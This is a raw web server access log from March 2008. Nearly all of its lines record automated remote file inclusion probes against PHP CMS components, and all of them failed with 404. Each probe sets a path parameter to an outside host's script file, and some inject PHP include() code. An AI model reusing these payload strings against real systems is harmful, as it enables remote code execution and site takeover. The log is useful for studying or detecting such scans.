217.110.209.230 - - [23/Mar/2008:07:19:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:19:57 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:19:58 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:19:58 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:19:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:19:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:20:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [23/Mar/2008:07:20:11 -0700] "GET /logs/access.log//atom.php5?page=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [23/Mar/2008:07:20:12 -0700] "GET /logs//atom.php5?page=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:20:21 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:20:40 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:20:46 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:21:10 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:21:10 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:21:11 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:21:18 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:21:41 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:22:29 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:23:13 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.145.175.68 - - [23/Mar/2008:07:23:41 -0700] "GET /logs//components/com_users/layout.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.145.175.68 - - [23/Mar/2008:07:23:41 -0700] "GET //components/com_users/layout.php?mosConfig_absolute_path=http://www.ebiexperts.com/components/com_content/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:23:52 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:07:23:55 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.60.207.200 - - [23/Mar/2008:07:23:55 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:07:23:55 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.60.207.200 - - [23/Mar/2008:07:23:56 -0700] "GET /errors.php?error=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:07:23:56 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.60.207.200 - - [23/Mar/2008:07:23:56 -0700] "GET /logs/errors.php?error=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:23:57 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:23:58 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.249.117.99 - - [23/Mar/2008:07:24:31 -0700] "GET //index.php?page=shop.browse&option=com_virtuemart&Itemid=10&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.249.117.99 - - [23/Mar/2008:07:24:42 -0700] "GET /logs//index.php?page=shop.browse&option=com_virtuemart&Itemid=10&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:24:48 -0700] "GET /logs/1%3Ehttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:24:49 -0700] "GET /1%3Ehttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:24:49 -0700] "GET /logs/1%3Ehttp://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:24:50 -0700] "GET /logs/1%3Ehttp://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:24:50 -0700] "GET /1%3Ehttp://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.8.154.216 - - [23/Mar/2008:07:24:51 -0700] "GET /1%3Ehttp://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:07:25:10 -0700] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:07:25:11 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [23/Mar/2008:07:25:17 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.111 - - [23/Mar/2008:07:25:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.101 - - [23/Mar/2008:07:25:25 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.186.169.183 - - [23/Mar/2008:07:25:26 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.186.169.183 - - [23/Mar/2008:07:25:26 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:25:29 -0700] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:25:30 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:25:32 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.37.111 - - [23/Mar/2008:07:25:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.110.50.105 - - [23/Mar/2008:07:25:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lafiasca.com//components/com_rwcards/la.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:07:25:43 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:25:51 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:25:51 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:25:51 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:26:27 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:26:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:26:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:27:03 -0700] "GET /logs/access.log//atom.php5?page=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:27:05 -0700] "GET //atom.php5?page=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:27:06 -0700] "GET /logs//atom.php5?page=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:07:27:39 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.30.155 - - [23/Mar/2008:07:28:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.18.44 - - [23/Mar/2008:07:28:02 -0700] "GET / HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:28:11 -0700] "GET /logs/access_080124.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:28:23 -0700] "GET /logs/access_080126.log//modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:28:25 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:28:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:28:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:07:28:59 -0700] "GET //index.php?option=com_comprofiler&task=userProfile&user=&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:29:08 -0700] "GET /logs/access_071230.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:07:29:08 -0700] "GET /logs//index.php?option=com_comprofiler&task=userProfile&user=&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:29:12 -0700] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:07:29:22 -0700] "GET /logs/access_080215.log//index.php?option=com_comprofiler&task=userProfile&user=&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.51.34 - - [23/Mar/2008:07:29:32 -0700] "GET /logs/access.log//index.php?option=com_comprofiler&task=userProfile&user=&mosConfig_absolute_path=http://www.folgoreclan.com/mio/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.4.88.40 - - [23/Mar/2008:07:29:33 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.moppy.be/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
81.4.88.40 - - [23/Mar/2008:07:29:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.moppy.be/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.61.37.111 - - [23/Mar/2008:07:30:03 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [23/Mar/2008:07:30:03 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.169.96.27 - - [23/Mar/2008:07:30:07 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:30:29 -0700] "GET /logs/access_080201.log/excelwriter/Writer.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:30:29 -0700] "GET /excelwriter/Writer.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:30:29 -0700] "GET /logs/excelwriter/Writer.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:07:30:41 -0700] "GET /logs/access_080220.log/excelwriter/Writer.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [23/Mar/2008:07:30:49 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:07:30:49 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:07:30:50 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:31:53 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:31:53 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:31:53 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:31:53 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:07:32:18 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:07:32:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:07:32:25 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:32:28 -0700] "GET /logs/access_080228.log//block.poll.php?where_cms=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:32:28 -0700] "GET //block.poll.php?where_cms=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:07:32:28 -0700] "GET /logs//block.poll.php?where_cms=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:07:32:47 -0700] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
63.247.139.40 - - [23/Mar/2008:07:33:04 -0700] "GET /errors.php?error=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
63.247.139.40 - - [23/Mar/2008:07:33:04 -0700] "GET /logs/errors.php?error=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:07:33:13 -0700] "GET /logs/access_080201.log/excelwriter/Writer.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:07:33:14 -0700] "GET /excelwriter/Writer.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:07:33:15 -0700] "GET /logs/excelwriter/Writer.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [23/Mar/2008:07:33:47 -0700] "GET /errors.php?error=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.84.237.162 - - [23/Mar/2008:07:33:47 -0700] "GET /logs/errors.php?error=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.84.7.82 - - [23/Mar/2008:07:33:54 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
